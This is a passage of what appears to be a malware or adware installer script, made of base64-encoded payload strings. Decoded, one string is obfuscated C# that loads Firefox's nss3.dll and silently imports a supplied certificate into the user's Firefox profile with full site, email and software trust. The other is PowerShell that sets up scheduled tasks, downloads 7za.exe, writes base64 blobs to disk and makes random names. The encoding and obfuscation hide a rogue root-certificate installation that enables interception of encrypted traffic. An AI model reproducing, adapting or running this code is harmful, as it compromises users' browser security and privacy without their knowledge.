"c3QgdWludCBOU1NfSU5JVF9OT1JPT1RJTklUID0gMHgxMDsKICAgIGNvbnN0IHVpbnQgTlNTX0lOSVRfT1BUSU1JWkVTUEFDRSA9"+
"IDB4MjA7CiAgICBjb25zdCB1aW50IE5TU19JTklUX1BLMTFUSFJFQURTQUZFID0gMHg0MDsKICAgIGNvbnN0IHVpbnQgTlNTX0lO"+
"SVRfUEsxMVJFTE9BRCA9IDB4ODA7CiAgICBjb25zdCB1aW50IE5TU19JTklUX05PUEsxMUZJTkFMSVpFID0gMHgxMDA7CiAgICBj"+
"b25zdCB1aW50IE5TU19JTklUX1JFU0VSVkVEID0gMHgyMDA7CiAgICBjb25zdCB1aW50IE5TU19JTklUX0NPT1BFUkFURSA9IE5T"+
"U19JTklUX1BLMTFUSFJFQURTQUZFIHwgTlNTX0lOSVRfUEsxMVJFTE9BRCB8IE5TU19JTklUX05PUEsxMUZJTkFMSVpFIHwgTlNT"+
"X0lOSVRfUkVTRVJWRUQ7CgogICAgY29uc3Qgc3RyaW5nIFNFQ01PRF9EQiA9ICJzZWNtb2QuZGIiOwogICAgLy9TdHJ1Y3R1cmVz"+
"CiAgICBbU3RydWN0TGF5b3V0KExheW91dEtpbmQuU2VxdWVudGlhbCldCiAgICBwdWJsaWMgc3RydWN0IFNFQ0l0ZW0gCiAgICB7"+
"CiAgICAgICAgcHVibGljIHVpbnQgaVR5cGU7CiAgICAgICAgcHVibGljIEludFB0ciBiRGF0YTsKICAgICAgICBwdWJsaWMgdWlu"+
"dCBpRGF0YUxlbjsKICAgIH0KCiAgICBbU3RydWN0TGF5b3V0KExheW91dEtpbmQuU2VxdWVudGlhbCldCiAgICBwcml2YXRlIHN0"+
"cnVjdCBDZXJ0VHJ1c3RzCiAgICB7CiAgICAgICAgcHVibGljIGludCBpU2l0ZTsKICAgICAgICBwdWJsaWMgaW50IGlFbWFpbDsK"+
"ICAgICAgICBwdWJsaWMgaW50IGlTb2Z0OwogICAgfQoKICAgIHByaXZhdGUgZW51bSBTRUNDZXJ0VXNhZ2UKICAgIHsKICAgICAg"+
"ICBjZXJ0VXNhZ2VTU0xDbGllbnQgPSAwLAogICAgICAgIGNlcnRVc2FnZVNTTFNlcnZlciA9IDEsCiAgICAgICAgY2VydFVzYWdl"+
"U1NMU2VydmVyV2l0aFN0ZXBVcCA9IDIsCiAgICAgICAgY2VydFVzYWdlU1NMQ0EgPSAzLAogICAgICAgIGNlcnRVc2FnZUVtYWls"+
"U2lnbmVyID0gNCwKICAgICAgICBjZXJ0VXNhZ2VFbWFpbFJlY2lwaWVudCA9IDUsCiAgICAgICAgY2VydFVzYWdlT2JqZWN0U2ln"+
"bmVyID0gNiwKICAgICAgICBjZXJ0VXNhZ2VVc2VyQ2VydEltcG9ydCA9IDcsCiAgICAgICAgY2VydFVzYWdlVmVyaWZ5Q0EgPSA4"+
"LAogICAgICAgIGNlcnRVc2FnZVByb3RlY3RlZE9iamVjdFNpZ25lciA9IDksCiAgICAgICAgY2VydFVzYWdlU3RhdHVzUmVzcG9u"+
"ZGVyID0gMTAsCiAgICAgICAgY2VydFVzYWdlQW55Q0EgPSAxMQogICAgfQoJW1VubWFuYWdlZEZ1bmN0aW9uUG9pbnRlcihDYWxs"+
"aW5nQ29udmVudGlvbi5DZGVjbCldCiAgICBwcml2YXRlIGRlbGVnYXRlIGludCBGQ1lyeERMU3Ioc3RyaW5nIHNDb25maWdEaXIs"+
"IHN0cmluZyBjZXJ0UHJlZml4LCBzdHJpbmcga2V5UHJlZml4LCBzdHJpbmcgc2VjTW9kTmFtZSwgdWludCBmbGFncyk7CgogICAg"+
"cHJpdmF0ZSBpbnQgU2JpZChzdHJpbmcgc0NvbmZpZ0Rpciwgc3RyaW5nIGNlcnRQcmVmaXgsIHN0cmluZyBrZXlQcmVmaXgsIHN0"+
"cmluZyBzZWNNb2ROYW1lLCB1aW50IGZsYWdzKQogICAgewogICAgICAgIEludFB0ciBwUHJvYyA9IEdldFByb2NBZGRyZXNzKHFB"+
"aVNidG9pbywgIk5TU19Jbml0aWFsaXplIik7CiAgICAgICAgRkNZcnhETFNyIHB0ciA9IChGQ1lyeERMU3IpTWFyc2hhbC5HZXRE"+
"ZWxlZ2F0ZUZvckZ1bmN0aW9uUG9pbnRlcihwUHJvYywgdHlwZW9mKEZDWXJ4RExTcikpOwogICAgICAgIHJldHVybiBwdHIoc0Nv"+
"bmZpZ0RpciwgY2VydFByZWZpeCwga2V5UHJlZml4LCBzZWNNb2ROYW1lLCBmbGFncyk7CiAgICB9CgogICAgW1VubWFuYWdlZEZ1"+
"bmN0aW9uUG9pbnRlcihDYWxsaW5nQ29udmVudGlvbi5DZGVjbCldCiAgICBwcml2YXRlIGRlbGVnYXRlIEludFB0ciBZTWUoKTsK"+
"ICAgIHByaXZhdGUgSW50UHRyIHFIbGh4UEdSZSgpCiAgICB7CiAgICAgICAgSW50UHRyIHBQcm9jID0gR2V0UHJvY0FkZHJlc3Mo"+
"cUFpU2J0b2lvLCAiQ0VSVF9HZXREZWZhdWx0Q2VydERCIik7CiAgICAgICAgWU1lIHB0ciA9IChZTWUpTWFyc2hhbC5HZXREZWxl"+
"Z2F0ZUZvckZ1bmN0aW9uUG9pbnRlcihwUHJvYywgdHlwZW9mKFlNZSkpOwogICAgICAgIHJldHVybiBwdHIoKTsKICAgIH0KCiAg"+
"ICBbVW5tYW5hZ2VkRnVuY3Rpb25Qb2ludGVyKENhbGxpbmdDb252ZW50aW9uLkNkZWNsKV0KICAgIHByaXZhdGUgZGVsZWdhdGUg"+
"SW50UHRyIFJjV0JjVEUoKTsKICAgIHByaXZhdGUgSW50UHRyIFJrdEVJTHV5U0goKQogICAgewogICAgICAgIEludFB0ciBwUHJv"+
"YyA9IEdldFByb2NBZGRyZXNzKHFBaVNidG9pbywgIk5TU19TaHV0ZG93biIpOwogICAgICAgIFJjV0JjVEUgcHRyID0gKFJjV0Jj"+
"VEUpTWFyc2hhbC5HZXREZWxlZ2F0ZUZvckZ1bmN0aW9uUG9pbnRlcihwUHJvYywgdHlwZW9mKFJjV0JjVEUpKTsKICAgICAgICBy"+
"ZXR1cm4gcHRyKCk7CiAgICB9CgogICAgW1VubWFuYWdlZEZ1bmN0aW9uUG9pbnRlcihDYWxsaW5nQ29udmVudGlvbi5DZGVjbCld"+
"CiAgICBwcml2YXRlIGRlbGVnYXRlIGludCBmRm90bXJLKEludFB0ciBjZXJ0ZGIsIGludCB1c2FnZSwgdWludCBuY2VydHMsIHJl"+
"ZiBTRUNJdGVtW10gZGVyQ2VydHMsIHJlZiBJbnRQdHIgcmV0Q2VydHMsIHVpbnQga2VlcENlcnRzLCB1aW50IGNhT25seSwgSW50"+
"UHRyIG5pY2tuYW1lKTsKICAgIHByaXZhdGUgaW50IHZRWUMoSW50UHRyIGNlcnRkYiwgaW50IHVzYWdlLCB1aW50IG5jZXJ0cywg"+
"cmVmIFNFQ0l0ZW1bXSBkZXJDZXJ0cywgcmVmIEludFB0ciByZXRDZXJ0cywgdWludCBrZWVwQ2VydHMsIHVpbnQgY2FPbmx5LCBJ"+
"bnRQdHIgbmlja25hbWUpCiAgICB7CiAgICAgICAgSW50UHRyIHBQcm9jID0gR2V0UHJvY0FkZHJlc3MocUFpU2J0b2lvLCAiQ0VS"+
"VF9JbXBvcnRDZXJ0cyIpOwogICAgICAgIGZGb3RtcksgcHRyID0gKGZGb3RtckspTWFyc2hhbC5HZXREZWxlZ2F0ZUZvckZ1bmN0"+
"aW9uUG9pbnRlcihwUHJvYywgdHlwZW9mKGZGb3RtckspKTsKICAgICAgICByZXR1cm4gcHRyKGNlcnRkYiwgdXNhZ2UsIG5jZXJ0"+
"cywgcmVmIGRlckNlcnRzLCByZWYgcmV0Q2VydHMsIGtlZXBDZXJ0cywgY2FPbmx5LCBuaWNrbmFtZSk7CiAgICB9CgogICAgcHJp"+
"dmF0ZSBkZWxlZ2F0ZSBpbnQgSExHKEludFB0ciBjZXJ0ZGIsIEludFB0ciBjZXJ0LCByZWYgQ2VydFRydXN0cyB0cnVzdCk7CiAg"+
"ICBwcml2YXRlIGludCBLSW5ReWooSW50UHRyIGNlcnRkYiwgSW50UHRyIGNlcnQsIHJlZiBDZXJ0VHJ1c3RzIHRydXN0KQogICAg"+
"ewogICAgICAgIEludFB0ciBwUHJvYyA9IEdldFByb2NBZGRyZXNzKHFBaVNidG9pbywgIkNFUlRfQ2hhbmdlQ2VydFRydXN0Iik7"+
"CiAgICAgICAgSExHIHB0ciA9IChITEcpTWFyc2hhbC5HZXREZWxlZ2F0ZUZvckZ1bmN0aW9uUG9pbnRlcihwUHJvYywgdHlwZW9m"+
"KEhMRykpOwogICAgICAgIHJldHVybiBwdHIoY2VydGRiLCBjZXJ0LCByZWYgdHJ1c3QpOwogICAgfQoKICAgIFtVbm1hbmFnZWRG"+
"dW5jdGlvblBvaW50ZXIoQ2FsbGluZ0NvbnZlbnRpb24uQ2RlY2wpXQogICAgcHVibGljIGRlbGVnYXRlIGludCBMa3lsbXlMbShJ"+
"bnRQdHIgY2VydCwgdWludCBuY2VydHMpOwogICAgcHJpdmF0ZSBpbnQgaG9SS3VBbVZUKEludFB0ciBjZXJ0LCB1aW50IG5jZXJ0"+
"cykKICAgIHsKICAgICAgICBJbnRQdHIgcFByb2MgPSBHZXRQcm9jQWRkcmVzcyhxQWlTYnRvaW8sICJDRVJUX0Rlc3Ryb3lDZXJ0"+
"QXJyYXkiKTsKICAgICAgICBMa3lsbXlMbSBwdHIgPSAoTGt5bG15TG0pTWFyc2hhbC5HZXREZWxlZ2F0ZUZvckZ1bmN0aW9uUG9p"+
"bnRlcihwUHJvYywgdHlwZW9mKExreWxteUxtKSk7CiAgICAgICAgcmV0dXJuIHB0cihjZXJ0LCBuY2VydHMpOwogICAgfQoKCXBy"+
"aXZhdGUgSW50UHRyIHFBaVNidG9pbyA9IEludFB0ci5aZXJvOwoJCglwdWJsaWMgQm9vbGVhbiB5SnVXeGRseXVOKFN0cmluZyBz"+
"Q2VydCl7CiAgICAgICAgU3lzdGVtLkNvbnNvbGUuV3JpdGVMaW5lKCJFaGRtSEdtTEJ6TVhLbCBTdGFydCIpOwoJCVN0cmluZyBz"+
"UHJvZmlsZSA9IEdldFByb2ZpbGUoKTsKICAgICAgICBpZiAoU3RyaW5nLklzTnVsbE9yRW1wdHkoc1Byb2ZpbGUpKQogICAgICAg"+
"IHsKICAgICAgICAgICAgU3lzdGVtLkNvbnNvbGUuV3JpdGVMaW5lKCJQcm9maWxlIG5vdCBmb3VuZCIpOwogICAgICAgICAgICBy"+
"ZXR1cm4gZmFsc2U7CiAgICAgICAgfQogICAgICAgIFN5c3RlbS5Db25zb2xlLldyaXRlTGluZSgiUHJvZmlsZSBwYXRoPSIrc1By"+
"b2ZpbGUpOwogICAgICAgIGJ5dGVbXSBiQ2VydCA9IEdldENlcnRBc0J5dGVBcnJheShzQ2VydCk7CgkJSW50UHRyIGlwQ2VydCA9"+
"IE1hcnNoYWwuQWxsb2NIR2xvYmFsKGJDZXJ0Lkxlbmd0aCk7CgkJdHJ5CiAgICAgICAgewogICAgICAgICAgICBEaXJlY3RvcnlJ"+
"bmZvIGRpSW5zdGFsbFBhdGggPSBHZXRJUCgpOwogICAgICAgICAgICBTdHJpbmcgc0N1cnJlbnREaXJlY3RvcnkgPSBEaXJlY3Rv"+
"cnkuR2V0Q3VycmVudERpcmVjdG9yeSgpOwogICAgICAgICAgICBEaXJlY3RvcnkuU2V0Q3VycmVudERpcmVjdG9yeShkaUluc3Rh"+
"bGxQYXRoLkZ1bGxOYW1lKTsKICAgICAgICAgICAgU3lzdGVtLkNvbnNvbGUuV3JpdGVMaW5lKCJJbnN0YWxsIHBhdGg9IitkaUlu"+
"c3RhbGxQYXRoLkZ1bGxOYW1lKTsKICAgICAgICAgICAgZm9yZWFjaChGaWxlSW5mbyBmaURsbCBpbiBkaUluc3RhbGxQYXRoLkdl"+
"dEZpbGVzKCIqLmRsbCIpKQogICAgICAgICAgICB7CiAgICAgICAgICAgICAgICBpZiAoZmlEbGwuTmFtZS5FcXVhbHMoImJyZWFr"+
"cGFkaW5qZWN0b3IuZGxsIikpIGNvbnRpbnVlOwogICAgICAgICAgICAgICAgWHVYKGZpRGxsLkZ1bGxOYW1lKTsKICAgICAgICAg"+
"ICAgfQogICAgICAgICAgICBxQWlTYnRvaW8gPSBYdVgoZGlJbnN0YWxsUGF0aC5GdWxsTmFtZSArICJcXG5zczMuZGxsIik7CiAg"+
"ICAgICAgICAgIGlmIChxQWlTYnRvaW8uRXF1YWxzKEludFB0ci5aZXJvKSkKICAgICAgICAgICAgewogICAgICAgICAgICAgICAg"+
"U3lzdGVtLkNvbnNvbGUuV3JpdGVMaW5lKCJGaXJlZm94IGluc3RhbGwgZGlyZWN0b3J5IG5vdCBmb3VuZCIpOwogICAgICAgICAg"+
"ICAgICAgcmV0dXJuIGZhbHNlOwogICAgICAgICAgICB9CiAgICAgICAgICAgIERpcmVjdG9yeS5TZXRDdXJyZW50RGlyZWN0b3J5"+
"KHNDdXJyZW50RGlyZWN0b3J5KTsKICAgICAgICAgICAgLy9Jbml0IGNlcnQKICAgICAgICAgICAgTWFyc2hhbC5Db3B5KGJDZXJ0"+
"LCAwLCBpcENlcnQsIGJDZXJ0Lkxlbmd0aCk7CiAgICAgICAgICAgIFNFQ0l0ZW0gQ2VydEl0ZW0gPSBuZXcgU0VDSXRlbSgpOwog"+
"ICAgICAgICAgICBDZXJ0SXRlbS5pVHlwZSA9IDM7CiAgICAgICAgICAgIENlcnRJdGVtLmJEYXRhID0gaXBDZXJ0OwogICAgICAg"+
"ICAgICBDZXJ0SXRlbS5pRGF0YUxlbiA9ICh1aW50KWJDZXJ0Lkxlbmd0aDsKICAgICAgICAgICAgU0VDSXRlbVtdIGFDZXJ0SXRl"+
"bSA9IG5ldyBTRUNJdGVtWzFdOwogICAgICAgICAgICBhQ2VydEl0ZW1bMF0gPSBDZXJ0SXRlbTsKCiAgICAgICAgICAgIENlcnRU"+
"cnVzdHMgQ2VydFRydXN0ID0gbmV3IENlcnRUcnVzdHMoKTsKICAgICAgICAgICAgQ2VydFRydXN0LmlTaXRlID0gMHgxMDsKICAg"+
"ICAgICAgICAgQ2VydFRydXN0LmlFbWFpbCA9IDB4MTA7CiAgICAgICAgICAgIENlcnRUcnVzdC5pU29mdCA9IDB4MTA7CiAgICAg"+
"ICAgICAgIFN5c3RlbS5Db25zb2xlLldyaXRlTGluZSgiSW5pdCBjZXJ0IE9LIik7CiAgICAgICAgICAgIC8vRW5kIGluaXQgY2Vy"+
"dAogICAgICAgICAgICBpbnQgc3RhdHVzID0gU2JpZChzUHJvZmlsZSwgIiIsICIiLCBTRUNNT0RfREIsIE5TU19JTklUX09QVElN"+
"SVpFU1BBQ0UpOwogICAgICAgICAgICBpZiAoc3RhdHVzICE9IE9HZSkKICAgICAgICAgICAgewogICAgICAgICAgICAgICAgU3lz"+
"dGVtLkNvbnNvbGUuV3JpdGVMaW5lKFN0cmluZy5Gb3JtYXQoIk5TU19Jbml0UmVhZFdyaXRlIEVSUk9SLiBTdGF0dXM6IDB4ezA6"+
"WH07TGFzdCBlcnJvcjogMHh7MDpYfSIsIHN0YXR1cywgTWFyc2hhbC5HZXRMYXN0V2luMzJFcnJvcigpKSk7CiAgICAgICAgICAg"+
"ICAgICByZXR1cm4gZmFsc2U7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgSW50UHRyIGJkID0gcUhsaHhQR1JlKCk7CiAgICAg"+
"ICAgICAgIGlmIChiZCA9PSBJbnRQdHIuWmVybykKICAgICAgICAgICAgewogICAgICAgICAgICAgICAgU3lzdGVtLkNvbnNvbGUu"+
"V3JpdGVMaW5lKCJDRVJUX0dldERlZmF1bHRDZXJ0REIgRmFpbGVkIik7CiAgICAgICAgICAgICAgICBSa3RFSUx1eVNIKCk7CiAg"+
"ICAgICAgICAgICAgICByZXR1cm4gZmFsc2U7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgU3lzdGVtLkNvbnNvbGUuV3JpdGVM"+
"aW5lKCJDRVJUX0dldERlZmF1bHRDZXJ0REIgT0siKTsKICAgICAgICAgICAgSW50UHRyIENlcnRUb0ltcG9ydCA9IG5ldyBJbnRQ"+
"dHIoKTsKICAgICAgICAgICAgSW50UHRyW10gYUNlcnRUb0ltcG9ydCA9IG5ldyBJbnRQdHJbMV07CiAgICAgICAgICAgIHN0YXR1"+
"cyA9IHZRWUMoYmQsIDExLCAxLCByZWYgYUNlcnRJdGVtLCByZWYgQ2VydFRvSW1wb3J0LCAxLCAwLCBJbnRQdHIuWmVybyk7CiAg"+
"ICAgICAgICAgIGlmIChzdGF0dXMgIT0gT0dlKQogICAgICAgICAgICB7CiAgICAgICAgICAgICAgICBTeXN0ZW0uQ29uc29sZS5X"+
"cml0ZUxpbmUoU3RyaW5nLkZvcm1hdCgiQ0VSVF9JbXBvcnRDZXJ0cyBFUlJPUi4gU3RhdHVzOiAweHswOlh9O0xhc3QgZXJyb3I6"+
"IDB4ezA6WH0iLCBzdGF0dXMsIE1hcnNoYWwuR2V0TGFzdFdpbjMyRXJyb3IoKSkpOwogICAgICAgICAgICAgICAgUmt0RUlMdXlT"+
"SCgpOwogICAgICAgICAgICAgICAgcmV0dXJuIGZhbHNlOwogICAgICAgICAgICB9CiAgICAgICAgICAgIFN5c3RlbS5Db25zb2xl"+
"LldyaXRlTGluZSgiQ0VSVF9JbXBvcnRDZXJ0cyBPSyIpOwogICAgICAgICAgICBNYXJzaGFsLkNvcHkoQ2VydFRvSW1wb3J0LCBh"+
"Q2VydFRvSW1wb3J0LCAwLCAxKTsKICAgICAgICAgICAgc3RhdHVzID0gS0luUXlqKGJkLCBhQ2VydFRvSW1wb3J0WzBdLCByZWYg"+
"Q2VydFRydXN0KTsKICAgICAgICAgICAgaWYgKCBzdGF0dXMgIT0gT0dlKSAKICAgICAgICAgICAgewogICAgICAgICAgICAgICAg"+
"U3lzdGVtLkNvbnNvbGUuV3JpdGVMaW5lKFN0cmluZy5Gb3JtYXQoIkNFUlRfQ2hhbmdlQ2VydFRydXN0IEVSUk9SLiBTdGF0dXM6"+
"IDB4ezA6WH07TGFzdCBlcnJvcjogMHh7MDpYfSIsIHN0YXR1cywgTWFyc2hhbC5HZXRMYXN0V2luMzJFcnJvcigpKSk7CiAgICAg"+
"ICAgICAgICAgICBSa3RFSUx1eVNIKCk7CiAgICAgICAgICAgICAgICByZXR1cm4gZmFsc2U7CiAgICAgICAgICAgIH07CiAgICAg"+
"ICAgICAgIFN5c3RlbS5Db25zb2xlLldyaXRlTGluZSgiQ0VSVF9DaGFuZ2VDZXJ0VHJ1c3QgT0siKTsKICAgICAgICAgICAgaG9S"+
"S3VBbVZUKENlcnRUb0ltcG9ydCwgMSk7CiAgICAgICAgICAgIFN5c3RlbS5Db25zb2xlLldyaXRlTGluZSgiQWRkIGNlcnQgT0si"+
"KTsKICAgICAgICB9CiAgICAgICAgY2F0Y2ggKEV4Y2VwdGlvbil7fQogICAgICAgIGZpbmFsbHkKICAgICAgICB7CiAgICAgICAg"+
"ICAgIFJrdEVJTHV5U0goKTsKICAgICAgICB9CgkJcmV0dXJuIHRydWU7Cgl9Cglwcml2YXRlIFN0cmluZyBHZXRQcm9maWxlKCkK"+
"ICAgIHsKICAgICAgICBTdHJpbmcgRkZQcm9maWxlID0gUGF0aC5Db21iaW5lKEVudmlyb25tZW50LkdldEVudmlyb25tZW50VmFy"+
"aWFibGUoIkFQUERBVEEiKSwgQCJNb3ppbGxhXEZpcmVmb3hcUHJvZmlsZXMiKTsKICAgICAgICBpZiAoRGlyZWN0b3J5LkV4aXN0"+
"cyhGRlByb2ZpbGUpKQogICAgICAgIHsKICAgICAgICAgICAgaWYgKERpcmVjdG9yeS5HZXREaXJlY3RvcmllcyhGRlByb2ZpbGUs"+
"ICIqLmRlZmF1bHQiKS5MZW5ndGggPiAwKQogICAgICAgICAgICB7CiAgICAgICAgICAgICAgICByZXR1cm4gRGlyZWN0b3J5Lkdl"+
"dERpcmVjdG9yaWVzKEZGUHJvZmlsZSwgIiouZGVmYXVsdCIpWzBdOwogICAgICAgICAgICB9CiAgICAgICAgfQogICAgICAgIHJl"+
"dHVybiAiIjsKICAgIH0KCXB1YmxpYyBieXRlW10gR2V0Q2VydEFzQnl0ZUFycmF5KFN0cmluZyBzQ2VydCkKICAgIHsKICAgICAg"+
"ICB0cnkKICAgICAgICB7CiAgICAgICAgICAgIHJldHVybiBDb252ZXJ0LkZyb21CYXNlNjRTdHJpbmcoc0NlcnQpOwogICAgICAg"+
"IH0KICAgICAgICBjYXRjaCAoRXhjZXB0aW9uKXt9CiAgICAgICAgcmV0dXJuIG51bGw7CiAgICB9Cglwcml2YXRlIERpcmVjdG9y"+
"eUluZm8gR2V0SVAoKQogICAgewogICAgICAgIERpcmVjdG9yeUluZm8gZnAgPSBudWxsOwogICAgICAgIC8vIGdldCBmaXJlZm94"+
"IHBhdGggZnJvbSByZWdpc3RyeQogICAgICAgIC8vIHdlJ2xsIHNlYXJjaCB0aGUgMzJiaXQgaW5zdGFsbCBsb2NhdGlvbgogICAg"+
"ICAgIFJlZ2lzdHJ5S2V5IGxvY2FsTWFjaGluZTEgPSBSZWdpc3RyeS5Mb2NhbE1hY2hpbmUuT3BlblN1YktleShAIlNPRlRXQVJF"+
"XE1vemlsbGFcTW96aWxsYSBGaXJlZm94IiwgZmFsc2UpOwogICAgICAgIC8vIGFuZCBsZXRzIHRyeSB0aGUgNjRiaXQgaW5zdGFs"+
"bCBsb2NhdGlvbiBqdXN0IGluIGNhc2UKICAgICAgICBSZWdpc3RyeUtleSBsb2NhbE1hY2hpbmUyID0gUmVnaXN0cnkuTG9jYWxN"+
"YWNoaW5lLk9wZW5TdWJLZXkoQCJTT0ZUV0FSRVxXb3c2NDMyTm9kZVxNb3ppbGxhXE1vemlsbGEgRmlyZWZveCIsIGZhbHNlKTsK"+
"CiAgICAgICAgaWYgKGxvY2FsTWFjaGluZTEgIT0gbnVsbCkKICAgICAgICB7CiAgICAgICAgICAgIHRyeQogICAgICAgICAgICB7"+
"CiAgICAgICAgICAgICAgICBzdHJpbmdbXSBpbnN0YWxsZWRWZXJzaW9ucyA9IGxvY2FsTWFjaGluZTEuR2V0U3ViS2V5TmFtZXMo"+
"KTsKICAgICAgICAgICAgICAgIC8vIHdlJ2xsIHRha2UgdGhlIGZpcnN0IGluc3RhbGxlZCB2ZXJzaW9uLCBwZW9wbGUgbm9ybWFs"+
"bHkgb25seSBoYXZlIG9uZQogICAgICAgICAgICAgICAgaWYgKGluc3RhbGxlZFZlcnNpb25zLkxlbmd0aCA9PSAwKQogICAgICAg"+
"ICAgICAgICAgICAgIHRocm93IG5ldyBJbmRleE91dE9mUmFuZ2VFeGNlcHRpb24oIk5vIGluc3RhbGxzIG9mIGZpcmVmb3ggcmVj"+
"b3JkZWQgaW4gaXRzIGtleS4iKTsKCiAgICAgICAgICAgICAgICBSZWdpc3RyeUtleSBtYWluSW5zdGFsbCA9IGxvY2FsTWFjaGlu"+
"ZTEuT3BlblN1YktleShpbnN0YWxsZWRWZXJzaW9uc1swXSk7CgogICAgICAgICAgICAgICAgLy8gZ2V0IGluc3RhbGwgZGlyZWN0"+
"b3J5CiAgICAgICAgICAgICAgICBzdHJpbmcgaW5zdGFsbFN0cmluZyA9IChzdHJpbmcpbWFpbkluc3RhbGwuT3BlblN1YktleSgi"+
"TWFpbiIpLkdldFZhbHVlKCJJbnN0YWxsIERpcmVjdG9yeSIsIG51bGwpOwoKICAgICAgICAgICAgICAgIGlmIChpbnN0YWxsU3Ry"+
"aW5nID09IG51bGwpCiAgICAgICAgICAgICAgICAgICAgdGhyb3cgbmV3IE51bGxSZWZlcmVuY2VFeGNlcHRpb24oIkluc3RhbGwg"+
"c3RyaW5nIHdhcyBudWxsIik7CgogICAgICAgICAgICAgICAgZnAgPSBuZXcgRGlyZWN0b3J5SW5mbyhpbnN0YWxsU3RyaW5nKTsK"+
"ICAgICAgICAgICAgfQogICAgICAgICAgICBjYXRjaCAoRXhjZXB0aW9uKQogICAgICAgICAgICB7CiAgICAgICAgICAgIH0KICAg"+
"ICAgICB9CiAgICAgICAgZWxzZSBpZiAobG9jYWxNYWNoaW5lMiAhPSBudWxsKQogICAgICAgIHsKICAgICAgICAgICAgdHJ5CiAg"+
"ICAgICAgICAgIHsKICAgICAgICAgICAgICAgIHN0cmluZ1tdIGluc3RhbGxlZFZlcnNpb25zID0gbG9jYWxNYWNoaW5lMi5HZXRT"+
"dWJLZXlOYW1lcygpOwogICAgICAgICAgICAgICAgLy8gd2UnbGwgdGFrZSB0aGUgZmlyc3QgaW5zdGFsbGVkIHZlcnNpb24sIHBl"+
"b3BsZSBub3JtYWxseSBvbmx5IGhhdmUgb25lCiAgICAgICAgICAgICAgICBpZiAoaW5zdGFsbGVkVmVyc2lvbnMuTGVuZ3RoID09"+
"IDApCiAgICAgICAgICAgICAgICAgICAgdGhyb3cgbmV3IEluZGV4T3V0T2ZSYW5nZUV4Y2VwdGlvbigiTm8gaW5zdGFsbHMgb2Yg"+
"ZmlyZWZveCByZWNvcmRlZCBpbiBpdHMga2V5LiIpOwoKICAgICAgICAgICAgICAgIFJlZ2lzdHJ5S2V5IG1haW5JbnN0YWxsID0g"+
"bG9jYWxNYWNoaW5lMi5PcGVuU3ViS2V5KGluc3RhbGxlZFZlcnNpb25zWzBdKTsKCiAgICAgICAgICAgICAgICAvLyBnZXQgaW5z"+
"dGFsbCBkaXJlY3RvcnkKICAgICAgICAgICAgICAgIHN0cmluZyBpbnN0YWxsU3RyaW5nID0gKHN0cmluZyltYWluSW5zdGFsbC5P"+
"cGVuU3ViS2V5KCJNYWluIikuR2V0VmFsdWUoIkluc3RhbGwgRGlyZWN0b3J5IiwgbnVsbCk7CgogICAgICAgICAgICAgICAgaWYg"+
"KGluc3RhbGxTdHJpbmcgPT0gbnVsbCkKICAgICAgICAgICAgICAgICAgICB0aHJvdyBuZXcgTnVsbFJlZmVyZW5jZUV4Y2VwdGlv"+
"bigiSW5zdGFsbCBzdHJpbmcgd2FzIG51bGwiKTsKICAgICAgICAgICAgICAgIGZwID0gbmV3IERpcmVjdG9yeUluZm8oaW5zdGFs"+
"bFN0cmluZyk7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgY2F0Y2ggKEV4Y2VwdGlvbikKICAgICAgICAgICAgewogICAgICAg"+
"ICAgICB9CiAgICAgICAgfQogICAgICAgIHJldHVybiBmcDsKICAgIH0KfQoiQDsKW0VoZG1IR21MQnpNWEtsXTo6TW1NYVJ1d3Vo"+
"QlJaQ1IoKS55SnVXeGRseXVOKCIlQ0VSVCUiKTsKfQpMR0N4d0JNSGFr",
    Ghq: "JFNIX1RZUEVfU0NIRURVTEVEX1RBU0s9MTsKJFNIX1RZUEVfVEFTS19TQ0hFRFVMRVI9MjsKJHNjaGVkdWxlclR5cGU9JFNIX1RZUEVfU0NIRURVTEVEX1RBU0s7CmZ1bmN0aW9uIEZWUkNsc2dnTVJBWgp7CnBhcmFtKFtzdHJpbmddJHppcGZpbGUsIFtzdHJpbmdd"+
"JGRlc3RpbmF0aW9uKTsKJDd6ID0gSm9pbi1QYXRoICRlbnY6QUxMVVNFUlNQUk9GSUxFICc3emEuZXhlJzsKaWYgKC1OT1QgKFRlc3QtUGF0aCAkN3opKXsKVHJ5CnsKKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQpLkRvd25sb2FkRmlsZSgnaHR0cHM6"+
"Ly9jaG9jb2xhdGV5Lm9yZy83emEuZXhlJywkN3opOwp9CkNhdGNoe30KfQppZiAoJChUcnkgeyBUZXN0LVBhdGggJDd6LnRyaW0oKSB9IENhdGNoIHsgJGZhbHNlIH0pKXsKU3RhcnQtUHJvY2VzcyAiJDd6IiAtQXJndW1lbnRMaXN0ICJ4IC1vYCIkZGVzdGluYXRp"+
"b25gIiAteSBgIiR6aXBmaWxlYCIiIC1XYWl0IC1Ob05ld1dpbmRvdwp9CmVsc2V7CiRzaGVsbCA9IG5ldy1vYmplY3QgLWNvbSBzaGVsbC5hcHBsaWNhdGlvbjsKJHppcCA9ICRzaGVsbC5OYW1lU3BhY2UoJHppcGZpbGUpOwpmb3JlYWNoKCRpdGVtIGluICR6aXAu"+
"aXRlbXMoKSkKewokc2hlbGwuTmFtZXNwYWNlKCRkZXN0aW5hdGlvbikuY29weWhlcmUoJGl0ZW0pOwp9Cn0KfQpmdW5jdGlvbiBCYXNlNjRUb0ZpbGUKewpwYXJhbShbc3RyaW5nXSRmaWxlLCBbc3RyaW5nXSRzdHJpbmcpOwokYnl0ZXM9W1N5c3RlbS5Db252ZXJ0"+
"XTo6RnJvbUJhc2U2NFN0cmluZygkc3RyaW5nKTsKI3NldC1jb250ZW50IC1lbmNvZGluZyBieXRlICRmaWxlIC12YWx1ZSAkYnl0ZXM7CltJTy5GaWxlXTo6V3JpdGVBbGxCeXRlcygkZmlsZSwgJGJ5dGVzKTsKfQpmdW5jdGlvbiBSYW5kb21TdHJpbmd7CiAgICBw"+
"YXJhbShbaW50XSRtaW49NSwgW2ludF0kbWF4PTE1KTsKICAgIHJldHVybiAoLWpvaW4gKCg0OC4uNTcpKyg2NS4uOTApKyg5Ny4uMTIyKSB8IEdldC1SYW5kb20gLUNvdW50IChHZXQtUmFuZG9tIC1taW5pbXVtICRtaW4gLW1heGltdW0gJG1heCkgfCAlIHtbY2hh"+
